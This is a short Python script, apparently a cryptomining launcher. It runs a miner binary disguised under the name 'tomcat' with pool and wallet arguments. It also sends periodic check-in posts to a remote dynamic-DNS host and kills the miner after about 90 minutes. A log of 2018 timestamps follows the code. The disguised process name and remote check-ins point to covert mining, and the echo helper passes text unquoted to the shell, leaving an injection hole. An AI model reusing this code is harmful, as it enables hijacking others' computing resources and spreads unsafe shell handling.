import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:16:04.183777
#2018-02-17 16:05:03.425225
#2018-02-17 17:52:02.226320
#2018-02-17 19:39:03.835011
#2018-02-17 21:28:01.836281
#2018-02-17 23:12:01.602779
#2018-02-18 00:59:05.456133
#2018-02-18 02:47:04.035275
#2018-02-18 04:36:01.389262
#2018-02-18 06:27:01.895598
#2018-02-18 08:15:06.186875
#2018-02-18 10:03:03.597512
#2018-02-18 11:49:01.299350
#2018-02-18 13:34:04.844644
#2018-02-18 15:23:06.576334
#2018-02-18 17:12:07.576722
#2018-02-18 19:00:05.938073
#2018-02-18 20:46:06.450324
#2018-02-18 22:33:05.371694
#2018-02-19 00:21:06.734396
#2018-02-19 02:07:05.415676
#2018-02-19 03:55:03.029126
#2018-02-19 05:40:01.614310
#2018-02-19 07:28:07.273805
#2018-02-19 09:18:07.263707
#2018-02-19 11:08:02.027543
#2018-02-19 12:55:04.547401
#2018-02-19 14:42:04.502504
#2018-02-19 16:31:02.993822
#2018-02-19 18:18:01.532426
#2018-02-19 20:06:06.979534
#2018-02-19 21:54:01.764887
#2018-02-19 23:40:10.278401
#2018-02-20 01:27:01.640847
#2018-02-20 03:16:05.264471
#2018-02-20 05:02:02.134820
#2018-02-20 06:46:05.600992
#2018-02-20 08:32:08.348260
#2018-02-20 10:16:05.717500
#2018-02-20 12:03:01.387120
#2018-02-20 13:49:09.059753
#2018-02-20 15:34:10.650658
#2018-02-20 17:19:07.933560
#2018-02-20 19:10:06.193831
#2018-02-20 20:58:06.518565
#2018-02-20 22:42:07.744652
#2018-02-21 00:24:07.986079
#2018-02-21 02:11:05.389157
#2018-02-21 03:57:05.812740
#2018-02-21 05:44:01.796134
#2018-02-21 07:32:05.711758
#2018-02-21 09:17:01.544969
#2018-02-21 11:06:05.669399
#2018-02-21 12:53:06.014631
#2018-02-21 14:41:02.124150
#2018-02-21 16:28:11.896146
#2018-02-21 18:19:02.220138
#2018-02-21 20:04:08.993505
#2018-02-21 21:51:04.094353
#2018-02-21 23:37:06.379441
#2018-02-22 01:25:03.704258
#2018-02-22 03:13:02.159612
#2018-02-22 04:59:01.663882
#2018-02-22 06:43:05.328066
#2018-02-22 08:32:01.872159
#2018-02-22 10:19:07.331351
#2018-02-22 12:06:11.005387
#2018-02-22 13:53:07.437072
#2018-02-22 15:40:09.552451
#2018-02-22 17:26:05.350075
#2018-02-22 19:14:06.269771
#2018-02-22 21:07:02.111573
#2018-02-22 22:50:09.353205
#2018-02-23 00:39:03.579867
#2018-02-23 02:26:07.228781
#2018-02-23 04:16:07.189180
#2018-02-23 06:03:01.490191
#2018-02-23 07:48:06.440563
#2018-02-23 09:50:10.671688
#2018-02-23 11:55:07.669637
#2018-02-23 13:44:10.993621
#2018-02-23 15:31:05.819052
#2018-02-23 17:21:07.693156
#2018-02-23 19:06:01.272750
#2018-02-23 20:51:03.886065
#2018-02-23 22:36:05.271845
#2018-02-24 00:22:04.323621
#2018-02-24 02:14:07.580004
#2018-02-24 04:04:04.701388
#2018-02-24 05:52:05.489211
#2018-02-24 07:41:04.190303
#2018-02-24 09:27:01.785225
#2018-02-24 11:20:01.760657
#2018-02-24 13:09:04.914643
#2018-02-24 14:58:07.488452
#2018-02-24 16:47:06.852668
#2018-02-24 18:35:07.747139
#2018-02-24 20:24:01.245040
#2018-02-24 22:19:05.119264
#2018-02-25 01:27:05.038786
#2018-02-25 05:08:06.055533
#2018-02-25 10:27:02.025221